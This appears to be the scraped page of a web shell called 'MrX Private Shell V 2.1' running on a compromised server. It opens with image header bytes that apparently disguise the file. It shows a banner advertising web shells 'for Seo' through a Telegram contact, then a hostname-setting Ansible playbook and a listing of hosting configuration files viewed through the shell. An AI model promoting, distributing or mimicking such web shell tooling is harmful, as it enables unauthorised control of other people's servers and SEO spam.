����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
---
- name: Set hostname
hostname:
name: "{{ hostname }}"
- name: Set brand file
copy:
dest: /etc/.brand
content: "{{ brand }}\n"
- name: Set hosts
template:
src: templates/hosts.j2
dest: /etc/hosts
- name: configure getaddrinfo
template:
src: templates/gai.conf.j2
dest: /etc/gai.conf
- name: Restart console
command: /usr/bin/killall mingetty
ignore_errors: True
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| admin_tools.yaml | File | 249 B | 0644 |
|
| cpanel.yaml | File | 2.67 KB | 0664 |
|
| hostgator.yaml | File | 5.04 KB | 0664 |
|
| mysql.yaml | File | 326 B | 0644 |
|
| plain.yaml | File | 405 B | 0644 |
|
| plesk.yaml | File | 182 B | 0644 |
|
| set_hostname.yaml | File | 158 B | 0644 |
|